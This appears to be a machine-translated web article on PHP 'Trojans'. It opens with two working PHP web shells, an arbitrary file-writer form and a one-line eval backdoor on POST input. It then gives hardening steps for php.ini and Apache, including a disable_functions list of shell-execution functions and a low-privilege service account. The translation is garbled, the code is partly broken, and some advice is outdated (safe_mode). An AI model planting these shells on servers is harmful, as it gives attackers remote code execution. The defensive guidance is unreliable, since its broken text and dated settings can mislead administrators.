PHP Web Trojan
Copy Code code as follows:
<?php
Header ("content-type:text/html; charset=gb2312 ");
if (GET_MAGIC_QUOTES_GPC ()) foreach ($_post as $k => $v) $_post[$k] = stripslashes ($v);
?>
<form method= "POST" >
Save file name: <input type= "text" name= "file" size= "" value= " echo str_replace (' \ \ ', '/', __file__)?> ">
<br><br>
<textarea name= "text" cols= "rows=" ></textarea>
<br><br>
<input type= "Submit" name= "Submit" value= "Save" >
<form>
<?php
if (isset ($_post[' file '))
{
$fp = @fopen ($_post[' file '], ' WB ');
Echo @fwrite ($fp, $_post[' text '))? ' Save success! ': ' Save failure! '
@fclose ($FP);
}
?>
Word PHP Trojan
Copy Code code as follows:
<?php eval ($_post[cmd]);? >
The prevention method of PHP Trojan Horse
PHP is one of the tools that will allow you to generate dynamic Web pages. PHP Web files are treated as generic HTML Web pages, and you can write PHP in the normal way you edit HTML.
PHP representative, hypertext Preprocessor (php:hypertext preprocessor), can be downloaded freely from the PHP official site (http://www.php.net). PHP complies with the GNU Public License (GPL), under which many popular software such as Linux and Emacs are born. PHP can be run on most Unix platforms, Gun/linux and Microsoft Windows platforms. How to install PHP on a PC machine or UNIX machine on a Windows environment can be found on the PHP website. The installation process is simple.
Another advantage of PHP is his security, with the current development of the Internet, network security more and more attention, the birth of PHP almost replaced the ASP, because PHP for security settings is very simple not like the ASP needs many steps, and disable a lot of services. However, there will always be a good thing, if the default settings of the PHP agreement is also vulnerable, so this article on how to do some security configuration of PHP, to prevent the destruction of the script Trojan.
First, to prevent the implementation of PHP Trojan Webshell
Open Safe_mode, in the php.ini, set the disable_functions= Passthru,exec,shell_exec,system either can be selected.
Second, prevent jumping out of the web directory
First modify httpd.conf, if you only allow your PHP script program to operate in the Web directory, you can also modify the httpd.conf file to restrict the PHP operation path. For example, your web directory is/usr/local/apache/htdocs, then add a few lines to the httpd.conf: Php_admin_value Open_basedir/usr/local/apache/htdocs, If the script is to read a file other than/usr/local/apache/htdocs, it will not be allowed, and if the error appears to be turned on, the error will be prompted: Warning:open_basedir restriction in effect. The File is in wrong directory in/usr/local/apache/htdocs/open.php to line 4 and so on.
Third, prevent PHP Trojan read and write file directory
In the php.ini disable_functions= Passthru,exec,shell_exec,system followed by the PHP processing file function, mainly has the Fopen,mkdir,rmdir,chmod,unlink, Dir,fopen,fread,fclose,fwrite,file_exists,closedir,is_dir,readdir.opendir,fileperms.copy,unlink,delfile. That becomes disable_functions= Passthru,exec,shell_exec,system,fopen,mkdir,rmdir,chmod,unlink,dir, Fopen,fread,fclose, Fwrite,file_exists, Closedir,is_dir,readdir.opendir, Fileperms.copy,unlink,delfile.
OK, done, PHP Trojan take we have no way, unfortunately, the use of the text database of those things can not be used. If you are in the WinDOS platform to build Apache also need to pay attention to, Apache default run is System permissions, you must give Apache down the permissions, as follows:
NET user Apache F**kmicrosoft/add
net localgroup users Apache/del
At this time established a user does not belong to any group Apche, as long as open the Computer Manager-Service-apache service Properties-log on-this account, here to fill in the above established accounts and passwords, restart the Apache service can achieve Apache run under low privileges.
Summary: In fact, you can achieve security by setting permissions on individual folders to create a single user who can read and write to each directory. Many of today's virtual hosting providers have popular configuration methods, but this approach is used to prevent this from being a bit overqualified. As long as our administrator has the security consciousness, the relative confinement function can guarantee the network security threat.
Here are McAfee's security settings to prevent some Web trojans from generating files.
Http://www.jb51.net/hack/list461_1.html
